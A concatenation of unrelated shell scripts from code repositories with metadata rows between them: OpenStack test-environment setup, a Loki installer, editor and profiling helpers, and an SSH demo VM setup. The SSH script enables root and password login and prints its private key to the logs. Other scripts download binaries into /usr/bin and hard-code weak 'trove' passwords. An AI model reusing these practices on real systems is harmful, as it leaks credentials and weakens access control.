# [application_catalog]
pkgos_inifile set ${TEMPEST_CONF} application_catalog region regionOne
# [auth]
pkgos_inifile set ${TEMPEST_CONF} auth admin_project_name admin
pkgos_inifile set ${TEMPEST_CONF} auth admin_password ${RC_KEYSTONE_ADMINPASS}
# [compute]
pkgos_inifile set ${TEMPEST_CONF} compute image_ref ${IMAGE_REF}
pkgos_inifile set ${TEMPEST_CONF} compute image_ref_alt ${IMAGE_REF}
if [ "${TEST_IMAGE_TYPE}" = debian ] ; then
pkgos_inifile set ${TEMPEST_CONF} validation image_ssh_user debian
else
pkgos_inifile set ${TEMPEST_CONF} validation image_ssh_user cirros
fi
pkgos_inifile set ${TEMPEST_CONF} validation image_ssh_password ${IMAGE_PASS}
pkgos_inifile set ${TEMPEST_CONF} validation network_for_ssh ext-net
pkgos_inifile set ${TEMPEST_CONF} compute fixed_network_name demo-net
pkgos_inifile set ${TEMPEST_CONF} compute-feature-enabled spice_console true
pkgos_inifile set ${TEMPEST_CONF} compute-feature-enabled allow_duplicate_networks true
# [dashboard]
pkgos_inifile set ${TEMPEST_CONF} dashboard dashboard_url http://${DEFROUTE_IP}/
# [network]
pkgos_inifile set ${TEMPEST_CONF} network tenant_network_cidr ${TENANT_NET_CIDR}
PUBLIC_NETWORK_ID=`pkgos_get_id neutron net-show ext-net`
pkgos_inifile set ${TEMPEST_CONF} network public_network_id ${PUBLIC_NETWORK_ID}
# We shouldn't do this. Doing it fails all tests
# PUBLIC_ROUTER_ID=`pkgos_get_id neutron router-show demo-router`
# pkgos_inifile set ${TEMPEST_CONF} network public_router_id ${PUBLIC_ROUTER_ID}
pkgos_inifile set ${TEMPEST_CONF} network default_network 192.168.64.0/20
pkgos_inifile set ${TEMPEST_CONF} network tenant_network_v6_cidr 2403:cc00:1000:8888:200:20ff:fe01:8402/64
# [orchestration]
pkgos_inifile set ${TEMPEST_CONF} orchestration instance_type m1.small
pkgos_inifile set ${TEMPEST_CONF} orchestration keypair_name odtkey
# [service_available]
# pkgos_inifile set ${TEMPEST_CONF} service_available zaqar false
pkgos_inifile set ${TEMPEST_CONF} service_available swift true
pkgos_inifile set ${TEMPEST_CONF} service_available ceilometer true
pkgos_inifile set ${TEMPEST_CONF} service_available horizon true
# pkgos_inifile set ${TEMPEST_CONF} service_available ironic false
pkgos_inifile set ${TEMPEST_CONF} service_available nova true
pkgos_inifile set ${TEMPEST_CONF} service_available cinder true
# pkgos_inifile set ${TEMPEST_CONF} service_available trove false
pkgos_inifile set ${TEMPEST_CONF} service_available heat true
pkgos_inifile set ${TEMPEST_CONF} service_available aodh true
# pkgos_inifile set ${TEMPEST_CONF} service_available sahara false
pkgos_inifile set ${TEMPEST_CONF} service_available glance true
pkgos_inifile set ${TEMPEST_CONF} service_available neutron true
}
gen_ssh_root_key () {
ssh-keygen -t rsa -N "" -f .ssh/id_rsa
nova keypair-add --pub-key .ssh/id_rsa.pub odtkey
}
setup_loopback_based_lvm_vg () {
echo "===> Creating a 40 GB loopback file used as LVM"
## Create a 10GB file on the root
#dd if=/dev/zero of=/lvm-data.dat count=20971520
# Create a 40GB file on the root
#dd if=/dev/zero of=/lvm-data.dat count=83886080 sparse
qemu-img create /lvm-data.dat 40G
# Setup the loopback device
losetup /dev/loop0 /lvm-data.dat
# Create the PV
pvcreate /dev/loop0
# Create the VG
vgcreate pkgosvg0 /dev/loop0
# Activate the pkgosvg0
vgchange -a y pkgosvg0
echo "Done!"
}
setup_real_hdd_based_lvm_vg () {
echo "===> Creating new volume group on device ${OTCI_LVM_DEVICE} (will destroy everything there...)"
parted /dev/${OTCI_LVM_DEVICE} mklabel msdos -s
parted /dev/${OTCI_LVM_DEVICE} mkpart primary ext4 -a optimal 2048 48G
parted /dev/${OTCI_LVM_DEVICE} set 1 lvm on
pvcreate /dev/${OTCI_LVM_DEVICE}1 -ff -y
vgcreate pkgosvg0 /dev/${OTCI_LVM_DEVICE}1
vgchange -a y pkgosvg0
echo "Done!"
}
setup_loopback_based_swift () {
### NOTE: this comes from http://docs.openstack.org/developer/swift/development_saio.html ###
echo "===> Installing Swift and xfsprogs"
DEBIAN_FRONTEND=noninteractive ${APTGET} install swift swift-proxy swift-account swift-container swift-object swift-object-expirer xfsprogs
if [ "${LVMTYPE}" = "loopback" ] ; then
echo "===> Creating swift HDDs using a 20 GB loopback file at /srv/swift-disk"
# Create the loopback device
mkdir -p /srv
qemu-img create /srv/swift-disk 20G
mkfs.xfs /srv/swift-disk
# Mount it
mkdir /mnt/sdb1
echo "/srv/swift-disk /mnt/sdb1 xfs loop,noatime,nodiratime,nobarrier,logbufs=8 0 0" >>/etc/fstab
mount /mnt/sdb1
elif [ "${LVMTYPE}" = "resetup" ] ; then
echo "===> Creating swift HDDs using a 48GB file on /dev/${OTCI_LVM_DEVICE}2"
mkdir -p /srv
# Create the partition and the FS
parted /dev/${OTCI_LVM_DEVICE} mkpart primary xfs -a optimal 48G 96G
sleep 5
mkfs.xfs /dev/${OTCI_LVM_DEVICE}2 -f
# Mount it
mkdir /mnt/sdb1
echo "/dev/${OTCI_LVM_DEVICE}2 /mnt/sdb1 xfs loop,noatime,nodiratime,nobarrier,logbufs=8 0 0" >>/etc/fstab
mount /mnt/sdb1
fi
echo "===> Configuring Swift & rsync"
# Setup swift disks
mkdir /mnt/sdb1/1 /mnt/sdb1/2 /mnt/sdb1/3 /mnt/sdb1/4
chown swift:swift /mnt/sdb1/*
for x in `seq 1 4`; do ln -s /mnt/sdb1/$x /srv/$x; done
mkdir -p /srv/1/node/sdb1 /srv/1/node/sdb5 \
/srv/2/node/sdb2 /srv/2/node/sdb6 \
/srv/3/node/sdb3 /srv/3/node/sdb7 \
/srv/4/node/sdb4 /srv/4/node/sdb8 \
/var/run/swift
chown -R swift:swift /var/run/swift
# **Make sure to include the trailing slash after /srv/$x/**
for x in `seq 1 4`; do chown -R swift:swift /srv/$x/; done
# Common Post-Device Setup
mkdir -p /var/cache/swift /var/cache/swift2 /var/cache/swift3 /var/cache/swift4
chown swift:swift /var/cache/swift*
# Enable rsyncd for swift
cp /usr/share/openstack-deploy/saio/rsyncd.conf /etc
sed -i s/RSYNC_ENABLE=false/RSYNC_ENABLE=true/ /etc/default/rsync
service rsync restart
# Copy the saio config files for swift
rm -rf /etc/swift/
mkdir -p /etc/swift/
cp -rfv /usr/share/openstack-deploy/saio/swift/* /etc/swift/
chown -R swift:swift /etc/swift
# Customize the config (ie: keystone authtoken)
pkgos_inifile set /etc/swift/proxy-server.conf filter:authtoken admin_password ${RC_KEYSTONE_ADMINPASS}
pkgos_inifile set /etc/swift/proxy-server.conf filter:authtoken identity_uri http://${DEFROUTE_IP}:35357/
pkgos_inifile set /etc/swift/proxy-server.conf filter:authtoken auth_uri http://${DEFROUTE_IP}:5000/
pkgos_inifile set /etc/swift/proxy-server.conf filter:authtoken auth_url http://${DEFROUTE_IP}:5000/
# Create the swift ring
chmod +x /usr/share/openstack-deploy/saio/bin/remakerings
/usr/share/openstack-deploy/saio/bin/remakerings
# Restart swift after the config is good
for i in `ls /etc/init.d/swift-*` ; do $i stop ; done
for i in `ls /etc/init.d/swift-*` ; do $i start ; done
echo "===> Creating swift endpoints in Keystone catalog"
# Setup the endpoint
openstack --os-identity-api-version=3 service create --description "OpenStack Object Storage" --name swift object-store
openstack --os-identity-api-version=3 endpoint create --region regionOne swift public http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s
openstack --os-identity-api-version=3 endpoint create --region regionOne swift admin http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s
openstack --os-identity-api-version=3 endpoint create --region regionOne swift internal http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s
#openstack --os-domain-name default --os-identity-api-version=3 endpoint create --publicurl http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s --adminurl http://${DEFROUTE_IP}:8080/ --internalurl http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s --region regionOne swift
}
install_cinder () {
# At this point in time, cinder should already be preseeded by openstack-deploy,
# so just installing it this way should be fine
DEBIAN_FRONTEND=noninteractive ${APTGET} install cinder-api cinder-volume python-cinderclient cinder-backup cinder-scheduler
if [ -x /usr/bin/lsb_release ] && [ `lsb_release -a | grep Codename | awk '{print $2}'` = "wheezy" ] ; then
DEBIAN_FRONTEND=noninteractive ${APTGET} install -t wheezy-backports tgt || true
else
DEBIAN_FRONTEND=noninteractive ${APTGET} install tgt || true
fi
# Set configuration for swift-backup (normally not needed...)
#pkgos_inifile set /etc/cinder/cinder.conf backup_swift_tenant admin
#pkgos_inifile set /etc/cinder/cinder.conf backup_swift_user admin
#pkgos_inifile set /etc/cinder/cinder.conf backup_swift_key admin
}
restart_swift_again () {
echo "===> Stopping swift..."
for i in /etc/init.d/swift* ; do $i stop ; done
echo "===> Waiting 5 seconds..."
sleep 5
echo "===> Starting swift..."
for i in /etc/init.d/swift* ; do $i start ; done
}
# Param: $1 = name
# $2 = ram
# $3 = disk
# $4 = vcpus
create_flavor_if_not_exists () {
RET=$(openstack flavor list --format=csv | q -d , -H 'SELECT ID FROM - WHERE `Name`="'${1}'"' 2>/dev/null)
if [ -z "${RET}" ] ; then
openstack flavor create --ram ${2} --disk ${3} --vcpus ${4} ${1}
RET=$(openstack flavor list --format=csv | q -d , -H 'SELECT ID FROM - WHERE `Name`="'${1}'"')
fi
}
set_nova_flavors () {
create_flavor_if_not_exists m1.tiny 512 1 1
M1_TINY_FLID=$RET
create_flavor_if_not_exists m1.small 2048 20 1
M1_SMALL_FLID=$RET
create_flavor_if_not_exists m1.medium 4096 40 2
M1_MEDIUM_FLID=$RET
create_flavor_if_not_exists m1.large 8192 80 4
M1_LARGE_FLID=$RET
pkgos_inifile set ${TEMPEST_CONF} compute flavor_ref ${M1_TINY_FLID}
pkgos_inifile set ${TEMPEST_CONF} compute flavor_ref_alt ${M1_SMALL_FLID}
}
prepare_node_for_trove () {
openstack project create trove_for_trove_usage
openstack user create --password trove --project trove_for_trove_usage --email root@localhost --enable regular_trove_user
openstack user create --password trove --project trove_for_trove_usage --email root@localhost --enable admin_trove_user
openstack role add --user admin_trove_user --project trove_for_trove_usage admin
# TODO: fix this by packaging rabbitmqadmin within the rabbitmq-server package.
# This is already commited to git on Alioth, though a backport should be done.
echo "===> Downloading rabbitmqadmin to declare queues and exchanges"
wget https://raw.githubusercontent.com/rabbitmq/rabbitmq-management/rabbitmq_v3_6_0/bin/rabbitmqadmin -O /usr/bin/rabbitmqadmin
chmod +x /usr/bin/rabbitmqadmin
# The management is needed for rabbitmqadmin to work
rabbitmq-plugins enable rabbitmq_management
# Restarting is necessary to enable plugins
invoke-rc.d rabbitmq-server restart
# Add a new user to the rabbitmq for trove to use
rabbitmqctl add_user trove trove
# Set it as admin
rabbitmqctl set_user_tags trove administrator
# Set permissions
rabbitmqadmin --username=trove --password=trove --host=localhost declare permission vhost=/ user=trove configure='.*' write='.*' read='.*'
# Declare the exchange
rabbitmqadmin --username=trove --password=trove --host=localhost declare exchange name=trove type=topic durable=true
echo "#!/bin/sh
set -e
set -x
. /etc/pkgos/pkgos.conf
. /root/osinstallrc
APTGET=\"apt-get -o Dpkg::Options::=--force-confnew --force-yes -y\"
cp /etc/apt/sources.list.d/openstack.list \${BODI_CHROOT_PATH}/etc/apt/sources.list.d
echo \"#!/bin/sh
exit 101
\" >\${BODI_CHROOT_PATH}/usr/sbin/policy-rc.d
chmod +x \${BODI_CHROOT_PATH}/usr/sbin/policy-rc.d
chroot \${BODI_CHROOT_PATH} \${APTGET} update
chroot \${BODI_CHROOT_PATH} \${APTGET} install \${TARGET_OPENSTACK_REL}-\${TARGET_DISTRO}-archive-keyring
chroot \${BODI_CHROOT_PATH} \${APTGET} update
echo \"\${RC_MYSQL_SERVER_PKG_NAME} mysql-server/root_password password \${RC_MYSQL_PASSWORD}
\${RC_MYSQL_SERVER_PKG_NAME} mysql-server/root_password seen true
\${RC_MYSQL_SERVER_PKG_NAME} mysql-server/root_password_again password \${RC_MYSQL_PASSWORD}
\${RC_MYSQL_SERVER_PKG_NAME} mysql-server/root_password_again seen true
\" >\${BODI_CHROOT_PATH}/root/mysql-password-preseed
chroot \${BODI_CHROOT_PATH} debconf-set-selections /root/mysql-password-preseed
rm \${BODI_CHROOT_PATH}/root/mysql-password-preseed
DEBIAN_FRONTEND=noninteractive chroot \${BODI_CHROOT_PATH} \${APTGET} install -y trove-guestagent heat-cfntools mysql-server-5.5 percona-xtrabackup
rm \${BODI_CHROOT_PATH}/usr/sbin/policy-rc.d
mkdir -p \${BODI_CHROOT_PATH}/root/.ssh
cp /root/.ssh/id_rsa.pub \${BODI_CHROOT_PATH}/root/.ssh/authorized_keys
cp /root/.ssh/id_rsa.pub \${BODI_CHROOT_PATH}/root/.ssh/authorized_keys2
" >/root/trove-hook
pkgos-fix-config-default /etc/trove/trove-guestagent.conf oslo_messaging_rabbit rabbit_host ${RC_KEYSTONE_ENDPOINT_IP}
pkgos-fix-config-default /etc/trove/trove-guestagent.conf oslo_messaging_rabbit rabbit_userid trove
pkgos-fix-config-default /etc/trove/trove-guestagent.conf oslo_messaging_rabbit rabbit_password trove
pkgos-fix-config-default /etc/trove/trove-guestagent.conf DEFAULT swift_url http://${RC_KEYSTONE_ENDPOINT_IP}:8080/v1/AUTH_
pkgos-fix-config-default /etc/trove/trove-guestagent.conf DEFAULT os_region_name regionOne
pkgos-fix-config-default /etc/trove/trove-guestagent.conf DEFAULT swift_service_type object-store
pkgos-fix-config-default /etc/trove/trove-guestagent.conf DEFAULT trove_auth_url http://${RC_KEYSTONE_ENDPOINT_IP}:5000/v2.0
chmod +x /root/trove-hook
build-openstack-debian-image -r jessie --hook-script /root/trove-hook -p trovepass -u ${DEBIAN_REPO_PARAM} -s ${DEBIAN_REPO_PARAM}
#trove-manage datastore_update mysql ""
#trove-manage datastore_version_update mysql 5.5 mysql aefce61e-af5a-4139-8f38-e7a32207a329 mysql-server-5.5 1
#trove-manage datastore_update mysql 5.5
glance --os-username admin_trove_user --os-password trove --os-project-name trove_for_trove_usage image-create --name trove-image --visibility public --container-format ovf --disk-format qcow2 --owner admin_trove_user --file debian-jessie-8.0.0-1-amd64.qcow2
echo "#cloud-config
packages:
- trove-guestagent
- mysql-server-5.5
# config file for trove guestagent
write_files:
- path: /etc/trove/trove-guestagent.conf
content: |
rabbit_host = ${RC_KEYSTONE_ENDPOINT_IP}
rabbit_password = trove
rabbit_userid = trove
" >/etc/trove/cloudinit/mysql.cloudinit
}
deploy_tempest_install_pkgs
create_non_admin_keystone_user
build_and_upload_image
fix_tempest_config
gen_ssh_root_key
if [ "${LVMTYPE}" = "loopback" ] ; then
setup_loopback_based_lvm_vg
elif [ "${LVMTYPE}" = "resetup" ] ; then
setup_real_hdd_based_lvm_vg
fi
setup_loopback_based_swift
install_cinder
restart_swift_again
set_nova_flavors
#prepare_node_for_trove
| true
|
d4cd6af89279d28b661265e76547f6f3fab457d5
|
Shell
|
frostyfrog/dotfiles
|
/fbin/fbterm-bi
|
UTF-8
| 254
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
# fbterm-bi: a wrapper script to enable background image with fbterm
# usage: fbterm-bi /path/to/image fbterm-options
echo -ne "\e[?251" # hide cursor
fbv -ciuker "$1" << EOF
q
EOF
shift
export FBTERM_BACKGROUND_IMAGE=1
exec fbterm "$@"
| true
|
22a091b458530347b17d7ba20f4fbb294f72d03a
|
Shell
|
5monkeys/docker-nginx-streaming
|
/envconf.sh
|
UTF-8
| 673
| 3.984375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Usage: envconf.sh (<template-dir> <template-dir> ...)
# Example: envconf.sh
# envconf.sh /etc/nginx/conf.d
#
# By default, all .template files will be recursive found in /etc/nginx
#
# Finds uppercase variables only matching ${...} pattern, to not break
# and substitute nginx-variables, and then uses envsubst to create
# conf file in same dir as template.
#for f in ${1:-/etc/nginx/**/*.template}; do
for f in ${TEMPLATE_PATH:-/etc/nginx/**/*.template}; do
if [ -f ${f} ]; then
echo "Rendering template: ${f}"
variables=$(echo $(grep -Eo '\${[A-Z_]+}' $f))
envsubst "${variables}" < ${f} > ${f%.*}.conf;
fi
done
exec "$@"
| true
|
0898e51cecff24d67addf23c853e29f45390bb7b
|
Shell
|
corgan2222/dotfiles
|
/home/.dot/installer/loki.sh
|
UTF-8
| 2,156
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
loki_linux-amd64()
{
#LOKI_ZIP="/usr/local/bin/loki-linux-amd64.zip"
wget "https://github.com/grafana/loki/releases/download/v1.4.1/loki-linux-amd64.zip"
unzip "loki-linux-amd64.zip"
mv "loki-linux-amd64" "/usr/local/bin/loki"
rm "loki-linux-amd64.zip"
chmod a+x "/usr/local/bin/loki"
mkdir -p /data/loki
mkdir -p /etc/loki
LOKI_CONF_FILE="/etc/loki/config-loki.yml"
cat > $LOKI_CONF_FILE <<EOF
auth_enabled: false
server:
http_listen_port: 3100
ingester:
lifecycler:
address: 127.0.0.1
ring:
kvstore:
store: inmemory
replication_factor: 1
final_sleep: 0s
chunk_idle_period: 5m
chunk_retain_period: 30s
schema_config:
configs:
- from: 2018-04-15
store: boltdb
object_store: filesystem
schema: v9
index:
prefix: index_
period: 168h
storage_config:
boltdb:
directory: /data/loki/index
filesystem:
directory: /data/loki/chunks
limits_config:
enforce_metric_name: false
reject_old_samples: true
reject_old_samples_max_age: 168h
chunk_store_config:
max_look_back_period: 0
table_manager:
chunk_tables_provisioning:
inactive_read_throughput: 0
inactive_write_throughput: 0
provisioned_read_throughput: 0
provisioned_write_throughput: 0
index_tables_provisioning:
inactive_read_throughput: 0
inactive_write_throughput: 0
provisioned_read_throughput: 0
provisioned_write_throughput: 0
retention_deletes_enabled: false
retention_period: 0
EOF
echo "wrote loki config $LOKI_CONF_FILE"
LOKI_SERVICE_FILE="/etc/systemd/system/loki.service"
cat > $LOKI_SERVICE_FILE <<EOF
[Unit]
Description=Loki service
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/bin/loki -config.file /etc/loki/config-loki.yml
[Install]
WantedBy=multi-user.target
EOF
echo "wrote loki service $LOKI_SERVICE_FILE"
echo "run"
echo "sudo service loki start"
echo "sudo service loki status"
echo "close firewall"
echo "
iptables -A INPUT -p tcp -s localhost --dport 3100 -j ACCEPT
iptables -A INPUT -p tcp --dport 3100 -j DROP
iptables -L
"
}
loki_linux-amd64
| true
|
64dafe18fe1b77c9a4df97cf7e52be7291d18dfe
|
Shell
|
tagwint/gitrepone
|
/home/bin/ssebou/bin/chkvimfile
|
UTF-8
| 2,237
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
# PURPOSE: to be called from au in vim on buffer exit to save either/or
# - content of the buffer (when vim used as an external editor from browser)
# - file name for the history of recent used
# script supposed to work on both local and remote same way
LOCALVIMHIST=${ONTO4_DRCMDHIST:-/tmp}/${HOSTNAME} # this is for local
# file history to be saved in the same file name as command history, but diffrent extention
VIMRUEXT=${ONTO4_HEEXT:-vimru} #ONTO4_HEEXT can be defined locally, then it will be used to name local history files
BFILE="${@:-NooNxe}"
# this is how vim finds its temp dir, ensured no trailing backslash
VIMTMPDIR=$(sed 's|/*$||' <<<"${TMPDIR:-/tmp}")
#Regexp to ignore
IGNOREG='^'${VIMTMPDIR}'/tmp\..*$
/tmp/crontab\..*$
^EMPTYY$
^XScratch.*$'
REGEX="${VIMTMPDIR}/bash-fc\..*" ; [[ "${BFILE}" =~ $REGEX ]] && USECASE="UC01_FCXE" #https://en.wikipedia.org/wiki/Fc_(Unix) also in C-X C-E
REGEX="${VIMTMPDIR}/editserver/.*" ; [[ "${BFILE}" =~ $REGEX ]] && USECASE="UC02_EMED" #https://github.com/willmoffat/emacs-edit-chrome
REGEX="^.*svn-commit\..*tmp$" ; [[ "${BFILE}" =~ $REGEX ]] && USECASE="UC03_SVNC" #svn commit message
# if name matches ignore list, do nothing, exit
grep -qf <(for re in $IGNOREG; do printf "%s\n" $re; done) <<<"$BFILE" && { echo match ; exit 0; }
# echo "REGEX=${REGEX} BFILE is $BFILE USECASE IS ${USECASE:-None}">>/tmp/oooo
case $USECASE in
UC01_FCXE)
cat "$BFILE" >> /tmp/ctrlXE
;;
UC02_EMED)
VIMBAK=${HISTKEEP3:-${LOCALVIMHIST}}.editserver.$(TZ=Europe/Amsterdam date --iso-8601='seconds') # HISTKEEP3 only defined remotely, thus VIMBAK is defined appropriately
cat "$BFILE" > "${VIMBAK}"
;;
UC03_SVNC)
VIMSVNCIM=${HISTKEEP3:-${LOCALVIMHIST}}.svnmessage
echo "==== $(TZ=Europe/Amsterdam date --iso-8601='seconds')" >>"${VIMSVNCIM}"
cat "$BFILE" >> "${VIMSVNCIM}"
;;
*)
VIMHIST=${HISTKEEP3:-${LOCALVIMHIST}}.${VIMRUEXT}
if [[ -f "$BFILE" ]] ; then
echo "$(TZ=Europe/Amsterdam date --iso-8601='seconds') ${BFILE}">>${VIMHIST} # HISTKEEP3 only defined remotely, thus VIMHIST is defined appropriately
else
: # do nothing, there's no saved file actually
fi
;;
esac
| true
|
2bfe33aa0329b49c017434d8b08a13d33a09f586
|
Shell
|
hbz/metafacture-core
|
/travis/sonarqube.sh
|
UTF-8
| 1,107
| 3.15625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# Copyright 2017, 2018 Christoph Böhme
#
# Licensed under the Apache License, Version 2.0 the "License";
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Sonarqube analysis cannot be made when building pull requests because secure
# variables are not available in such builds. To prevent build failures, the
# sonarqube target is only invoked if not building a pull request.
#
function main {
require_no_pull_request
./gradlew sonarqube
}
function require_no_pull_request {
if [ -v TRAVIS_PULL_REQUEST -a "$TRAVIS_PULL_REQUEST" != "false" ]; then
echo "Building pull request. Skipping sonarqube analysis"
exit 0
fi
}
main
| true
|
0a659cfb49c2ea9b10bcb95ef20f37c8ba589c53
|
Shell
|
brummbar/dotfiles
|
/os/install_prezto.sh
|
UTF-8
| 2,083
| 3.90625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
cd "$(dirname "${BASH_SOURCE}")" && source "utils.sh"
declare -a FILES_TO_SYMLINK=(
"zlogin"
"zlogout"
"zpreztorc"
"zprofile"
"zshenv"
"zshrc"
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
main() {
declare -r BASE16_DIR="$HOME/.base16"
declare -r PREZTO_DIR="${ZDOTDIR:-$HOME}/.zprezto"
declare -r OS="$(get_os)"
local i=""
local sourceFile=""
local targetFile=""
# Check if `Git` is installed
if ! cmd_exists "git"; then
print_error "Git is required, please install it!\n"
exit 1
fi
# Clone base16-vim
if [ ! -d "$BASE16_DIR/base16-vim" ]; then
git clone https://github.com/chriskempson/base16-vim.git "$BASE16_DIR/base16-vim" &> /dev/null
print_result $? "Clone base16-vim" "true"
fi
# Clone base16-shell
if [ ! -d "$BASE16_DIR/base16-shell" ]; then
git clone https://github.com/chriskempson/base16-shell.git "$BASE16_DIR/base16-shell" &> /dev/null
print_result $? "Clone base16-shell" "true"
fi
# Clone Brummbar prezto
if [ ! -d $PREZTO_DIR ]; then
git clone --recursive https://github.com/brummbar/prezto.git $PREZTO_DIR &> /dev/null
print_result $? "Clone Brummbar prezto" "true"
fi
# Create symlinks for prezto
for i in ${FILES_TO_SYMLINK[@]}; do
sourceFile="${ZDOTDIR:-$HOME}/.zprezto/runcoms/$i"
targetFile="${ZDOTDIR:-$HOME}/.$i"
symlink $targetFile $sourceFile
done
# Symlink the matching vim color
mkdir -p "$HOME/.vim/colors"
symlink "$HOME/.vim/colors/base16-tomorrow-night.vim" "$BASE16_DIR/base16-vim/colors/base16-tomorrow-night.vim"
# Install iTerm2/Terminator color schemes based on os.
if [ "$OS" == "osx" ]; then
# todo: fetch profile
echo "nothing" &> /dev/null
elif [ "$OS" == "ubuntu" ]; then
sourceFile="$(cd .. && pwd)/terminator/config"
targetFile="$HOME/.config/terminator/config"
symlink $targetFile $sourceFile
fi
}
main
| true
|
d96b43d1368896fa8b01d18bb07c04f0beadbe58
|
Shell
|
cekerholic/dotfiles
|
/ubuntu/init.sh
|
UTF-8
| 744
| 2.546875
| 3
|
[] |
no_license
|
sudo apt-get update
# Install tmux
sudo apt-get install -y python-software-properties software-properties-common
sudo add-apt-repository -y ppa:pi-rho/dev
sudo apt-get update
sudo apt-get install -y tmux
ln -sfn $PWD/.tmux.conf ~/.tmux.conf
# essentials
sudo apt-get install -y build-essential libssl-dev curl
# git
sudo apt-get install -y git
sudo apt-get install -y gitk
ln -sfn $PWD/git/.gitconfig ~/.gitconfig
ln -sfn $PWD/git/.gitignore ~/.gitignore
# Install zsh
sudo apt-get install -y zsh
# Install oh-my-zsh
wget --no-check-certificate https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh -O - | sh
rm ~/.zshrc
ln -sfn $PWD/.zshrc ~/.zshrc
# Set zsh as default
chsh -s $(which zsh)
# Restart
sudo shutdown -r 0
| true
|
b13a86e77b89ac95f6fa6dc3506ed036804c12c8
|
Shell
|
duglin/ce-ssh
|
/vm/setup-vm
|
UTF-8
| 1,314
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/sh
set -ex
# Edit our sshd config to allow root login, and port forwarding
FILE=/etc/ssh/sshd_config
sed -i "s/^.*PermitRootLogin.*/PermitRootLogin without-password/" $FILE
sed -i "s/^.*PasswordAuthentication.*/PasswordAuthentication yes/" $FILE
sed -i "s/^.*AllowTcpForwarding.*/AllowTcpForwarding yes/" $FILE
# sed -i "s/^.*PermitOpen.*/PermitOpen any/" $FILE
# sed -i "s/^.*UsePAM.*/UsePAM yes/" $FILE
# echo "root:root" | chpasswd
# Generate hostkeys (used by sshd) and our public/private ssh keys
ssh-keygen -A
ssh-keygen -N "" -t rsa -b 4096 -f /root/.ssh/id_rsa
# NEVER DO THIS OUTSIDE OF A DEMO!
# Put the private key into our logs so we can use it from a client
set +x
cat /root/.ssh/id_rsa
sleep 1
# Add public key we generated to the authorized keys so our client can connect
cat /root/.ssh/id_rsa.pub > /root/.ssh/authorized_keys
# Ensure everything has the right permissions. ssh is picky
set -x
chmod go-rwx /root/.ssh/*
# Setup a TCP->UDP mapper if requested
if [[ -n "$UDP_PORT" && -n "$SERVICE_IP" && -n "$SERVICE_PORT" ]]; then
mkfifo /tmp/fifo
while true ; do
nc -vlp $UDP_PORT < /tmp/fifo | nc -vu $SERVICE_IP $SERVICE_PORT > /tmp/fifo
done &
fi
# Finally start sshd
# /usr/sbin/sshd -D -e
mkdir /etc/dropbear
while true ; do
dropbear -a -p 0.0.0.0:22 -R -F -E
done
| true
|
80faec181ae6b21f14f8c925c7326b9fadcd5640
|
Shell
|
coop182/lemp-dev
|
/bin/lemp.sh
|
UTF-8
| 1,627
| 3.4375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Setup NginX, MySql, PHP
apt-packages-install \
mysql-server \
nginx \
php5-fpm \
php5-common \
php5-cli \
php5-gd \
php5-curl \
phpmyadmin
# Allow unsecured remote access to MySQL.
mysql-remote-access-allow
# setup new mysql admin user
mysql -u root -e "GRANT ALL PRIVILEGES ON *.* TO 'admin'@'localhost' IDENTIFIED BY 'admin';"
mysql -u root -e "GRANT GRANT OPTION ON *.* TO 'admin'@'localhost' IDENTIFIED BY 'admin';"
# Restart MySQL service for changes to take effect.
mysql-restart
# Set PHP timezone
php-settings-update 'date.timezone' 'Europe/London'
# Install Composer
if [ ! -f "/usr/local/bin/composer" ]; then
curl -s https://getcomposer.org/installer | sudo php
sudo mv composer.phar /usr/local/bin/composer
fi
# Setup the localhost virtual host
if [ ! -d '/data/www/lempdev.localhost' ]; then
sudo mkdir -p /data/www/lempdev.localhost
PHP=/usr/bin/php5-fpm nginx-sites-create "lempdev.localhost" "/data/www/lempdev.localhost" "vagrant"
nginx-sites-enable "lempdev.localhost"
fi
#symlink phpmyadmin to localhost directory
if [ ! -d "/data/www/lempdev.localhost/phpmyadmin" ]; then
sudo ln -s /usr/share/phpmyadmin /data/www/lempdev.localhost
fi
# create virtual hosts
for site in `cat /vagrant/host-aliases`; do
if [ ! -d "/data/www/$site" ]; then
sudo mkdir -p /data/www/$site
PHP=/usr/bin/php5-fpm nginx-sites-create "$site" "/data/www/$site" "vagrant"
nginx-sites-enable "$site"
fi
done
php-fpm-restart
nginx-restart
| true
|
ca16ab38213f9d377c3818cc73f4e5f05e2340fe
|
Shell
|
golang/benchmarks
|
/cmd/bent/scripts/cpuprofile
|
UTF-8
| 372
| 3
| 3
|
[
"BSD-3-Clause",
"LicenseRef-scancode-google-patent-license-golang"
] |
permissive
|
#!/bin/bash
# Run args as command, but run cpuprofile and then pprof to capture test cpuprofile output
pf="${BENT_PROFILES}/${BENT_BINARY}_${BENT_I}.prof"
mkdir -p ${BENT_PROFILES}
"$@" -test.cpuprofile="$pf"
echo cpuprofile in "$pf"
if [[ x`which pprof` == x"" ]] ; then
go tool pprof -text -flat -nodecount=20 "$pf"
else
pprof -text -flat -nodecount=20 "$pf"
fi
| true
|
34334f517cfe7c685e5547543651d9d2eb0b39a9
|
Shell
|
PouuleT/docker-ovethebox
|
/setup_dnat.sh
|
UTF-8
| 734
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/sh
if [ "$#" -ne 3 ]; then
echo "Usage: \n"
echo "$0 <modem> <local_ip> <authorized_public_ip>"
exit 1
